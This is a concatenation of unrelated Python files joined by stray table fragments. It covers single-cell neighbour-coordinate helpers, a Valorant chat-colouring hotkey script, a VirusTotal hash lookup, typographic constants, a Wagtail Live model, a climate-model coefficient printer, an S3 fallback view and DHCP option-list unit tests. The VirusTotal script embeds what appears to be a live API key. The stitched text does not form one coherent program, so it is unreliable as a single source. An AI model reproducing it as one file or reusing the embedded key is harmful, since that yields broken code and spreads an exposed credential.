def indices_distancesDensematrix(D, n_neighbors):
    """For each row of the dense distance matrix *D*, return the indices of
    its n_neighbors nearest points and the matching distances, both ordered
    from closest to farthest (each point's own zero distance included)."""
    row_idx = np.arange(D.shape[0])[:, None]
    # argpartition finds the n smallest per row in O(n); argsort then
    # orders just that small subset
    nearest = np.argpartition(D, n_neighbors - 1, axis=1)[:, :n_neighbors]
    order = np.argsort(D[row_idx, nearest])
    indices = nearest[row_idx, order]
    distances = D[row_idx, indices]
    return indices, distances
def sparse_matrixindicesDistances(indices, distances, n_obs, n_neighbors):
    """Pack per-row neighbor indices/distances into an (n_obs, n_obs) CSR
    matrix. Explicit zeros (e.g. self-distances) are dropped."""
    indptr = np.arange(0, n_obs * n_neighbors + 1, n_neighbors)
    # copy the ravelled buffers: csr_matrix keeps references to its inputs,
    # and sharing the caller's arrays showed strange behavior here
    neighbor_graph = scipy.sparse.csr_matrix(
        (distances.copy().ravel(), indices.copy().ravel(), indptr),
        shape=(n_obs, n_obs),
    )
    neighbor_graph.eliminate_zeros()
    return neighbor_graph
def SWAPLINE_dist(dfnn, n_neighbors, dfposi, metric = 'euclidean', n_pcs=30, TopN=30):
    """For every cell, compute a per-cluster anchor coordinate from its
    nearest neighbors that belong to each cluster.

    Args:
        dfnn (pd.DataFrame): cells x features matrix (rows are cells).
        n_neighbors (int): neighbors kept per cell in the kNN search.
        dfposi (pd.DataFrame): per-cell table with a "Cluster" column, an
            "Index" column, and coordinates in iloc columns 0 and 1.
        metric (str): distance metric for pairwise_distances.
        n_pcs (int): number of principal components before distances.
        TopN (int): per-cluster neighbors averaged into the anchor.

    Returns:
        (dfcellclusumap1, dfcellclusumap2): cells x clusters DataFrames of
        jittered anchor coordinates (axis 1 and axis 0 respectively).
    """
    #n_pcs = 30, n_neighbors = len(dfnn.index), metric = 'euclidean'
    X = dfnn
    pca_ = PCA(n_components=n_pcs, svd_solver='arpack', random_state=0)
    X_pca = pca_.fit_transform(X)
    PariDistances = pairwise_distances(X_pca, metric=metric)
    knn_indices, knn_distances = indices_distancesDensematrix(PariDistances, n_neighbors)
    _distances = sparse_matrixindicesDistances(knn_indices, knn_distances, X_pca.shape[0], n_neighbors)
    dftestdist = pd.DataFrame(knn_distances)
    dftest = 0
    dftestindex = pd.DataFrame(knn_indices)
    # dfnn=df.T
    # dfnn.shape
    dftestindex.index = dfnn.index
    umap1AllCluster = []
    umap2AllCluster = []
    clusternames = list(set(dfposi["Cluster"]))
    # crude textual progress indicator written to stdout
    sys.stdout.write("[%s]" % "Processing")
    sys.stdout.flush()
    sys.stdout.write("\b" * (50 + 1)) # return to start of line, after '['
    perc = len(clusternames)
    for item in clusternames:
        # toolbar_width = len(clusternames)
        itemindex = clusternames.index(item)
        # setup toolbar
        sys.stdout.write("-%s%%-" % int(itemindex*100 / perc))
        sys.stdout.flush()
        umap1cluster = []
        umap2cluster = []
        clustemp = dfposi.loc[dfposi["Cluster"] == item]["Index"]
        for i in range(len(dftestindex.index)):
            # this cell's TopN nearest neighbors belonging to the cluster
            nearestvalue = dftestindex.iloc[i, :].loc[dftestindex.iloc[i, :].isin(clustemp)][:TopN].tolist()
            # blend the neighbors' mean coordinate 50/50 with the closest one
            umap1cluster.append(
                (dfposi.iloc[nearestvalue, 1].astype(float).mean() + dfposi.iloc[nearestvalue[0], 1]) / 2)
            umap2cluster.append(
                (dfposi.iloc[nearestvalue, 0].astype(float).mean() + dfposi.iloc[nearestvalue[0], 0]) / 2)
        # small uniform jitter so identical anchors don't overlap when plotted
        umap1AllCluster.append(umap1cluster + np.random.uniform(-0.075, 0.075, size=len(umap1cluster)))
        umap2AllCluster.append(umap2cluster + np.random.uniform(-0.075, 0.075, size=len(umap2cluster)))
    dfcellclusumap1 = pd.DataFrame(umap1AllCluster, index=clusternames, columns=dftestindex.index).T
    dfcellclusumap2 = pd.DataFrame(umap2AllCluster, index=clusternames, columns=dftestindex.index).T
    sys.stdout.write("]\n")
    return dfcellclusumap1, dfcellclusumap2
def SWAPLINE_assign(dfprobCL, negtest, n, dfcellclusumap1,dfcellclusumap2,nodelist):
    """Place each cell at probability-weighted coordinates of its best node.

    Args:
        dfprobCL (pd.DataFrame): cells x clusters probability table (in %).
        negtest: permutation-derived background subtracted from dfprobCL.
        n (int): number of top clusters summed per cell for the sum_nn row.
        dfcellclusumap1, dfcellclusumap2 (pd.DataFrame): per-cell,
            per-cluster anchor coordinates from SWAPLINE_dist.
        nodelist (list[list[str]]): candidate cluster triplets ("nodes");
            each cell is assigned to the triplet with highest summed
            probability.

    Returns:
        pd.DataFrame: cells x 2 assigned coordinates.
    """
    #n= len(set(dfposi["Cluster"]))
    #nodelist=[['Neural_crest', 'Neural_tube', 'Ectoderm'],['Neural_crest','Pericyte/SMC', 'VLMC'],['Neural_crest', 'Ectoderm','VLMC'],
    #['Rgl','Neural_tube', 'Ectoderm'],['Rgl','Neural_tube', 'Glia'],['Rgl','Neural_tube', 'OPCs'],['Rgl','Neural_tube', 'Neuron'],
    #['Rgl','OPCs', 'Neuron'],['Rgl','Glia', 'Neuron'],['Rgl','Glia', 'OPCs']]
    dffinalprob = dfprobCL - negtest
    dffinalprob[dffinalprob < 0] = 0  # clamp: background can exceed signal
    dfrank2 = dffinalprob.T
    # dfrank.shape
    sumlist = []
    for testx in range(len(dfrank2.columns)):
        dftempnn = dfprobCL.T.loc[dfrank2.nlargest(n, dfrank2.columns[testx]).iloc[:n, :].index, dfrank2.columns[testx]]
        sumlist.append(np.sum(dftempnn))
    dfsumnew = dfprobCL.T
    dfsumnew.loc["sum_nn"] = sumlist
    # NOTE(review): indexlist is computed but never used afterwards —
    # confirm whether filtering by sum_nn > 1 was meant to be applied.
    indexlist = dfsumnew.T.loc[dfsumnew.loc["sum_nn"] > 1].index
    dfrank = dffinalprob.T
    newumap1 = []
    newumap2 = []
    for testx in dfrank.columns:
        nodeprob = []
        for item in nodelist:
            nodeprob.append(dfrank[testx].loc[item].sum())
        # the node (cluster triplet) with the highest total probability wins
        nodename = nodelist[np.array(nodeprob).argmax(axis=0)]
        # dftempnn=dfrank.nlargest(n,testx)[testx][:n]
        dftempnn = dfrank.loc[nodename, testx]
        # probability-weighted average of the node's anchor coordinates
        newumap1.append(np.sum(dfcellclusumap1.loc[testx, dftempnn.index] * (dftempnn / np.sum(dftempnn))))
        newumap2.append(np.sum(dfcellclusumap2.loc[testx, dftempnn.index] * (dftempnn / np.sum(dftempnn))))
    dfnewumap = pd.DataFrame([newumap2, newumap1], columns=dffinalprob.index)
    dfnewumap=dfnewumap.T
    return dfnewumap
# Colorful VALORANT by b0kch01
import os, ctypes
# Disable quick-edit mode (pauses bot)
# Windows-only: GetStdHandle(-10) is STD_INPUT_HANDLE; mode 128 (0x80,
# ENABLE_EXTENDED_FLAGS) is set without ENABLE_QUICK_EDIT_MODE, so an
# accidental console click can't freeze the process.
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-10), 128)
from pyfiglet import Figlet
from termcolor import cprint, colored
import colorama
import keyboard
import time
# Fix legacy console color
colorama.init()
cprint("Setting up...")
cprint(" - [¤] Windows", "green")
cprint(" - [¤] Imported Modules", "green")
# global keyboard hooks require elevation on Windows; bail out early otherwise
if ctypes.windll.shell32.IsUserAnAdmin() == 0:
    cprint(" - [x] Please run as administrator", "red")
    input("[ ENTER ] to quit")
    exit(0)
def clear():
    """Clear the Windows console screen."""
    os.system("cls")
# User Interface
f = Figlet(font="ogre")
# background colors cycled through the title letters
bgs = ["on_red", "on_yellow", "on_green", "on_blue", "on_magenta"]
# rendered once at import time; render() reprints it on every change
CACHED_TITLESCREEN = f"""
{ "".join([colored(" " + "COLORFUL"[i] + " ", "grey", bgs[i % 4]) for i in range(8)]) }
{ colored(f.renderText("Valorant"), "red") }
{ colored(" Created with ♥ by b0kch01! ", "grey", "on_white") }
{ colored(" USE AT YOUR OWN RISK ", "grey", "on_yellow") }
"""
# index of the currently selected color tag (used modulo 5 everywhere)
i = 0
# chat color tags typed into the game, and the console color previewing each
colors = [
    "<enemy>",
    "<team>",
    "<system>",
    "<notification>",
    "<warning>"
]
colorMap = [
    "red",
    "blue",
    "yellow",
    "green",
    "magenta"
]
def goUp():
    """Select the next color tag and redraw the menu."""
    global i
    i = i + 1
    render()
def goDown():
    """Select the previous color tag and redraw the menu."""
    global i
    i = i - 1
    render()
def makeColor():
    """Wrap the just-typed chat line in the selected color tag.

    Triggered by the backslash hotkey: jumps to the start of the input
    line, types the opening tag, jumps to the end, deletes the backslash
    that fired the hotkey, appends the closing tag and sends the line.
    """
    time.sleep(0.05)  # let the triggering keystroke land before editing
    keyboard.send("home")
    keyboard.write(colors[i % 5])
    keyboard.send("end")
    keyboard.send("backspace")
    keyboard.write("</>")
    keyboard.send("\n")
def render():
    """Repaint the title screen and show the currently selected color tag."""
    global i
    clear()
    print(CACHED_TITLESCREEN)
    print("Color: " + colored(colors[i % 5], "white", "on_" + colorMap[i % 5]))
# Register hotkeys: "\" colorizes the current line, arrows change the color
keyboard.add_hotkey("\\", makeColor)
keyboard.add_hotkey("up", goUp)
keyboard.add_hotkey("down", goDown)
try:
    render()
    print("Instructions are on https://github.com/b0kch01/ColorfulValorant")
    print("\nEnjoy! :)")
    # block until "up + down" is pressed together, keeping the hooks alive
    keyboard.wait("up + down")
except KeyboardInterrupt:
    exit(0)
#!/usr/bin/env python
import json
import urllib
import urllib2
import sys
apikey = '843fa2012b619be746ead785b933d59820a2e357c7c186e581e8fcadbe2e550e'
def usage():
    """Print usage help and exit with status 1 (Python 2 print statement)."""
    print '''Submit hash to virtus-total
(Place your VirusTotal apikey in this script)
Usage: %s <hash>''' % sys.argv[0]
    exit(1)
def collect(data):
    """Pull the interesting fields out of a VirusTotal file-info response.

    Args:
        data: decoded JSON response, a list whose first element describes
            the queried sample.

    Returns:
        Tuple of (sha1, filenames, first_seen, last_seen,
        last_scan_permalink, last_scan_report).
    """
    record = data[0]
    fields = ('sha1', 'filenames', 'first-seen', 'last-seen',
              'last-scan-permalink', 'last-scan-report')
    sha1, filenames, first_seen, last_seen, permalink, report = [
        record[name] for name in fields]
    return sha1, filenames, first_seen, last_seen, permalink, report
def msg(sha1, filenames, first_seen, last_seen, last_scan_permalink):
    """Print a summary report for a sample flagged as malware
    (Python 2 print statement)."""
    print '''===Suspected Malware Item===
SHA1: %s
Filenames: %s
First Seen: %s
Last Seen: %s
Link: %s''' % (sha1, filenames, first_seen, last_seen, last_scan_permalink)
def is_malware(last_scan_report):
    """Return True if any antivirus engine reported a detection.

    Each value of *last_scan_report* is a per-engine scan entry whose first
    element is the detection name, or None when the engine found nothing.

    Uses .items() instead of the Python-2-only .iteritems() so the helper
    works unchanged under both Python 2 and 3.
    """
    for av, scan in last_scan_report.items():
        if scan[0] is not None:
            return True
    return False
def in_database(data, mhash):
    """True when VirusTotal has an entry for the hash (result != 0).

    *mhash* is unused but kept for interface compatibility with callers.
    """
    return data[0]['result'] != 0
def arguments():
    """Validate argv and the configured apikey; return the hash argument.

    Exits via usage() when no argument or '-h' is given, and with status 1
    when apikey is empty.
    """
    if len(sys.argv) < 2:
        usage()
    if '-h' in sys.argv[1]:
        usage()
    if not apikey:
        # Python 2 print statement
        print "Set apikey in %s to value of your Virus Total key" % sys.argv[0]
        exit(1)
    mhash = sys.argv[1]
    return mhash
def query_api(mhash, apikey):
    """POST the hash to the VirusTotal API and return the decoded JSON.

    Python 2 only (urllib/urllib2). Note the endpoint is plain HTTP, so
    the apikey is sent unencrypted.
    """
    url = "http://api.vtapi.net/vtapi/get_file_infos.json"
    parameters = {"resources": mhash, "apikey": apikey}
    encoded = urllib.urlencode(parameters)
    req = urllib2.Request(url, encoded)
    response = urllib2.urlopen(req)
    response_string = response.read()
    data = json.loads(response_string)
    return data
# Script entry point: query VirusTotal for the hash given on the command
# line; exit 0 only when the sample exists and is flagged as malware.
mhash = arguments()
data = query_api(mhash, apikey)
if not in_database(data, mhash):
    print 'No entry for %s in database' % mhash
    exit(1)
# Positive match found
sha1, filenames, first_seen, last_seen, last_scan_permalink, last_scan_report = collect(data)
if is_malware(last_scan_report):
    msg(sha1, filenames, first_seen, last_seen, last_scan_permalink)
    exit(0)
else:
    print 'Entry %s is not malicious' % mhash
    exit(1)
| 2,240 | 850 |
# Typographic character constants: spaces, dashes, math signs, quote marks
# and primes used for text post-processing.
__all__ = (
    'ANYSP',
    'DLQUO',
    'DPRIME',
    'LAQUO',
    'LDQUO',
    'LSQUO',
    'MDASH',
    'MDASH_PAIR',
    'MINUS',
    'NBSP',
    'NDASH',
    'NNBSP',
    'RAQUO',
    'RDQUO',
    'RSQUO',
    'SPRIME',
    'THNSP',
    'TIMES',
    'WHSP',
)
# Space characters
NBSP = '\u00A0'   # no-break space
NNBSP = '\u202F'  # narrow no-break space
THNSP = '\u2009'  # thin space
WHSP = ' '        # ordinary space
# Regex character class matching any of the spaces above
ANYSP = r'[{}{}{}{}]'.format(WHSP, NBSP, NNBSP, THNSP)
# Dashes and math signs
NDASH = '–'  # en dash
MDASH = '—'  # em dash
MDASH_PAIR = NNBSP + MDASH + THNSP  # em dash with fixed-width spaces around it
# NOTE(review): HYPHEN is an empty string and is not listed in __all__ —
# looks unfinished; confirm whether it should be '\u2010' (unicode hyphen).
HYPHEN = ''
MINUS = '−'  # true minus sign (not a hyphen)
TIMES = '×'  # multiplication sign
# Quotation marks and primes
LSQUO = '‘' # left curly quote mark
RSQUO = '’' # right curly quote mark/apostrophe
LDQUO = '“' # left curly quote marks
RDQUO = '”' # right curly quote marks
DLQUO = '„' # double low curly quote mark
LAQUO = '«' # left angle quote marks
RAQUO = '»' # right angle quote marks
SPRIME = '′' # single prime (minutes/feet)
DPRIME = '″' # double prime (seconds/inches)
| 791 | 393 |
""" Wagtail Live models."""
from django.db import models
from django.utils.timezone import now
from wagtail.admin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.core.fields import StreamField
from .blocks import LivePostBlock
class LivePageMixin(models.Model):
    """A helper class for pages using Wagtail Live.
    Attributes:
        channel_id (str):
            Id of the corresponding channel in a messaging app.
        live_posts (StreamField):
            StreamField containing all the posts/messages published
            respectively on this page/channel.
    """
    # blank=True lets a page exist before being bound to a channel;
    # unique=True guarantees at most one page per channel.
    channel_id = models.CharField(
        help_text="Channel ID",
        max_length=255,
        blank=True,
        unique=True,
    )
    live_posts = StreamField(
        [
            ("live_post", LivePostBlock()),
        ],
        blank=True,
    )
    # Wagtail admin edit panels.
    panels = [
        FieldPanel("channel_id"),
        StreamFieldPanel("live_posts"),
    ]
    @property
    def last_update_timestamp(self):
        """Timestamp (seconds since epoch) of the last update of this page.

        NOTE(review): relies on ``latest_revision_created_at`` being set;
        presumably raises AttributeError on a page with no revision -- confirm.
        """
        return self.latest_revision_created_at.timestamp()
    def _get_live_post_index(self, message_id):
        """Retrieves the index of a live post.
        Args:
            message_id (str):
                ID of the message corresponding to a live post.
        Returns:
            (int) Index of the live post if found, else None.
        """
        for i, post in enumerate(self.live_posts):
            if post.value["message_id"] == message_id:
                return i
        # Bare return: yields None when no post matches.
        return
    def get_live_post_index(self, message_id):
        """Retrieves index of a livepost, or None when not found."""
        return self._get_live_post_index(message_id=message_id)
    def get_live_post_by_index(self, live_post_index):
        """Retrieves a live post by its index.
        Args:
            live_post_index (str): Index of the live post to look for.
        Returns:
            (LivePostBlock) The live post instance
        Raises:
            (IndexError) if a live post with the given index doesn't exist.
        """
        return self.live_posts[live_post_index]
    def get_live_post_by_message_id(self, message_id):
        """Retrieves a live post by its ID.
        Args:
            message_id (str):
                ID of the message corresponding to a live post.
        Returns:
            (LivePostBlock) The live post instance
        Raises:
            (KeyError) if a live post with the given ID doesn't exist.
        """
        live_post_index = self.get_live_post_index(message_id=message_id)
        if live_post_index is None:
            raise KeyError
        return self.get_live_post_by_index(live_post_index)
    def add_live_post(self, live_post):
        """Adds a new live post to live page.
        Args:
            live_post (LivePostBlock):
                live post to add
        """
        posts = self.live_posts
        lp_index = 0
        post_created_at = live_post["created"]
        # Walk until we meet a post older than the new one; the stream is
        # therefore kept in descending creation order (newest first).
        while lp_index < len(posts):
            if posts[lp_index].value["created"] < post_created_at:
                break
            lp_index += 1
        # Insert to keep posts sorted by time
        self.live_posts.insert(lp_index, ("live_post", live_post))
        self.save_revision().publish()
    def delete_live_post(self, message_id):
        """Deletes the live post corresponding to message_id.
        Args:
            message_id (str):
                ID of the message corresponding to a live post.
        Raises:
            (KeyError) if live post containing message with message_id doesn't exist.
        """
        live_post_index = self.get_live_post_index(message_id=message_id)
        if live_post_index is None:
            raise KeyError
        del self.live_posts[live_post_index]
        self.save_revision().publish()
    def update_live_post(self, live_post):
        """Updates a live post when it has been edited.

        Assumes *live_post* is a block already contained in this page's
        stream: it only stamps the modification time and republishes.
        Args:
            live_post (livePostBlock): Live post to update.
        """
        live_post.value["modified"] = now()
        self.save_revision().publish()
    def get_updates_since(self, last_update_ts):
        """Retrieves new updates since a given timestamp value.
        Args:
            last_update_ts (DateTime):
                Timestamp of the last update.
        Returns:
            (dict, list) a tuple of (posts created or edited since
            last_update_ts, mapped id -> rendered HTML; ids of all
            currently visible posts) -- note the order: updates first.
        """
        current_posts, updated_posts = [], {}
        for post in self.live_posts:
            # Hidden posts are excluded from both collections.
            if not post.value["show"]:
                continue
            post_id = post.id
            current_posts.append(post_id)
            created = post.value["created"]
            if created > last_update_ts: # This is a new post
                updated_posts[post_id] = post.render(context={"block_id": post_id})
                continue
            last_modified = post.value["modified"]
            if last_modified and last_modified > last_update_ts:
                # This is an edited post
                updated_posts[post_id] = post.render(context={"block_id": post_id})
        return (updated_posts, current_posts)
    class Meta:
        # Mixin only: no table of its own; concrete pages inherit the fields.
        abstract = True
| 5,259 | 1,490 |
import numpy as np
from inprod_analytic import *
from params_maooam import natm, noc
# Compute the analytic inner products, then dump every coefficient whose
# magnitude exceeds machine epsilon (indices printed 1-based, Fortran-style).
init_inprod()
real_eps = 2.2204460492503131e-16
"""This module print the coefficients computed in the inprod_analytic module"""
# Atmospheric tensors: a, c (2-D) and b, g (3-D).
for i in range(0, natm):
    for j in range(0, natm):
        if(abs(atmos.a[i, j]) >= real_eps):
            print ("a["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.a[i, j])
        if(abs(atmos.c[i, j]) >= real_eps):
            print ("c["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.c[i, j])
        for k in range(0, natm):
            if(abs(atmos.b[i, j, k]) >= real_eps):
                print (
                    "b["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] =%.5E"
                    % atmos.b[i, j, k])
            if(abs(atmos.g[i, j, k]) >= real_eps):
                print (
                    "g["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % atmos.g[i, j, k])
# Atmosphere-ocean coupling tensors: d, s.
for i in range(0, natm):
    for j in range(0, noc):
        if(abs(atmos.d[i, j]) >= real_eps):
            print ("d["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.d[i, j])
        if(abs(atmos.s[i, j]) >= real_eps):
            print ("s["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % atmos.s[i, j])
# Oceanic tensors: M, N (2-D), O, C (3-D), and ocean-atmosphere K, W.
for i in range(0, noc):
    for j in range(0, noc):
        if(abs(ocean.M[i, j]) >= real_eps):
            print ("M["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.M[i, j])
        if(abs(ocean.N[i, j]) >= real_eps):
            print ("N["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E" % ocean.N[i, j])
        for k in range(0, noc):
            if(abs(ocean.O[i, j, k]) >= real_eps):
                print (
                    "O["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % ocean.O[i, j, k])
            if(abs(ocean.C[i, j, k]) >= real_eps):
                print (
                    "C["+str(i+1)+"]["+str(j+1)+"]["+str(k+1)+"] = % .5E"
                    % ocean.C[i, j, k])
    for j in range(0, natm):
        if(abs(ocean.K[i, j]) >= real_eps):
            print (
                "K["+str(i+1)+"]"+"["+str(j+1)+"] = % .5E"
                % ocean.K[i, j])
        if(abs(ocean.W[i, j]) >= real_eps):
            print (
                "W["+str(i+1)+"]" + "["+str(j+1)+"] = % .5E"
                % ocean.W[i, j])
from django.http import Http404, HttpResponse
from django.shortcuts import redirect
import boto3
from botocore.errorfactory import ClientError
from ..models import PersonProxy
def fallback(request):
    """Serve the archived legacy page for this path from S3.

    Looks up ``<path>/index.html`` in the legacy bucket and returns its
    body; raises Http404 when the object does not exist.
    """
    bucket = "legacy.openstates.org"
    key = "{}index.html".format(request.path.lstrip("/"))
    client = boto3.client("s3")
    try:
        body = client.get_object(Bucket=bucket, Key=key)["Body"].read()
        return HttpResponse(body)
    except ClientError:
        raise Http404(request.path + "index.html")
def legislator_fallback(request, legislator_id):
    """Permanently redirect a legacy legislator id to the person's page.

    Falls back to the archived S3 copy when no matching person exists.
    """
    try:
        person = PersonProxy.objects.get(
            identifiers__scheme="legacy_openstates",
            identifiers__identifier=legislator_id,
        )
    except PersonProxy.DoesNotExist:
        return fallback(request)
    return redirect(person.pretty_url(), permanent=True)
| 849 | 268 |
import unittest
from dhcppython import options
class OptionListTestCases(unittest.TestCase):
    """Behavioral tests for options.OptionList.

    The fixtures below encode OptionList's replace-in-place semantics:
    appending, inserting or index-assigning an option whose code already
    exists replaces the existing entry rather than adding a duplicate
    (see the append2 / update_by_index / insert expected lists).
    """
    def gen_optionslist(self):
        # Fresh five-option fixture (codes 61, 57, 60, 12, 55) per test.
        return options.OptionList(
            [
                options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                options.options.short_value_to_object(57, 1500),
                options.options.short_value_to_object(60, "android-dhcp-9"),
                options.options.short_value_to_object(12, "Galaxy-S9"),
                options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43])
            ]
        )
    # --- append: new code is added at the end ...
    def test_OptionsList_append1(self):
        opt_list = self.gen_optionslist()
        opt_list.append(options.options.short_value_to_object(1, "255.255.255.0"))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                    options.options.short_value_to_object(1, "255.255.255.0")
                ]
            )
        )
    # ... but appending an existing code (57) replaces it in place.
    def test_OptionsList_append2(self):
        opt_list = self.gen_optionslist()
        opt_list.append(options.options.short_value_to_object(57, 2000))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    # --- index assignment: setting a duplicate code collapses the old entry.
    def test_OptionList_update_by_index1(self):
        opt_list = self.gen_optionslist()
        opt_list[1] = options.options.short_value_to_object(57, 2000)
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_update_by_index2(self):
        opt_list = self.gen_optionslist()
        opt_list[0] = options.options.short_value_to_object(57, 2000)
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_update_by_index3(self):
        opt_list = self.gen_optionslist()
        opt_list[3] = options.options.short_value_to_object(57, 2000)
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    # --- insert: duplicate codes are replaced at their existing position,
    # new codes land at the requested (including negative) index.
    def test_OptionList_insert1(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(1, options.options.short_value_to_object(57, 2000))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_insert2(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(0, options.options.short_value_to_object(57, 2000))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_insert3(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(3, options.options.short_value_to_object(57, 2000))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(57, 2000),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_insert4(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(0, options.options.short_value_to_object(1, "255.255.255.0"))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(1, "255.255.255.0"),
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_insert5(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(-1, options.options.short_value_to_object(1, "255.255.255.0"))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(1, "255.255.255.0"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_insert6(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(5, options.options.short_value_to_object(1, "255.255.255.0"))
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                    options.options.short_value_to_object(1, "255.255.255.0"),
                ]
            )
        )
    # --- deletion by positive and negative index.
    def test_OptionList_del1(self):
        opt_list = self.gen_optionslist()
        del opt_list[0]
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
    def test_OptionList_del2(self):
        opt_list = self.gen_optionslist()
        del opt_list[-1]
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(60, "android-dhcp-9"),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                ]
            )
        )
    def test_OptionList_del3(self):
        opt_list = self.gen_optionslist()
        del opt_list[2]
        self.assertEqual(
            opt_list,
            options.OptionList(
                [
                    options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
                    options.options.short_value_to_object(57, 1500),
                    options.options.short_value_to_object(12, "Galaxy-S9"),
                    options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
                ]
            )
        )
